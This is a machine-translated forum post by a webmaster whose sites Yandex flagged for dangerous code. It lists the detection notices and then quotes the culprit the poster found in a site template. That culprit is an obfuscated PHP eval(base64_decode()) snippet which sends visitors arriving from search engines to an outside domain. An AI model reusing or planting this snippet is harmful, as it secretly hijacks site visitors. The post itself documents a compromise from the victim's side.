Yandex

Potentially dangerous code found on the website www.*****.ru

Yandex broke something in itself, I have half of the sites on different hostings, on their servers, no matter where the site is hosted.

messages like this appear.

and in webmaster.yandex.ru in general oil painting. for their servers ruchayu and antiviruses and the code itself checked and rootkits, the server is fresh, there are access restrictions. there is no left code in HTML for return. With the help of this service www.bertal.ru I put the Yandex user agent I poke the check, the usual clean html code without impurities. In general, pichalka. meanwhile, the site fell out of the search results, the flow of customers fell to a minimum. In addition, there are no details of what specific code he found.

На сайте www.*****.ru обнаружен потенциально опасный код 4.02.2012
На сайте *****.su обнаружен потенциально опасный код 3.02.2012
Перепроверка сайта *****.su не выявила потенциально опасного кода 31.01.2012
На сайте *****.su обнаружен потенциально опасный код 28.01.2012
Перепроверка сайта *****.su не выявила потенциально опасного кода 25.01.2012
На сайте *****.su обнаружен потенциально опасный код 25.01.2012
Перепроверка сайта www.*****.ru не выявила потенциально опасного кода 20.01.2012
На сайте www.*****.ru обнаружен потенциально опасный код 14.01.2012




That is, on the face of the fact that, as such, there is no virus, and Yandex swears at Google Analytics?

In general, it’s me losharo, it’s useful to move the scripts of Google anlistika, and there Achtung

<img src="<?php         eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcW
F6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR
0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZ
XIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0
cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIs
Im5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc
3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0
cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylc
JmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0
cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwi
aW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaW5kdXN0cnkuYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ
0KfQ0KfQ0KfQ==")); echo $this->baseurl ?>

etc.

I started digging when this script changed in the backups, but it turned out that it changed at the time of moving from one hosting to another, reloaded the client, and the site poured out from one hosting normal, and uploaded to another hosting already with changed scripts

Although this is for one site, it is not clear what the second one is.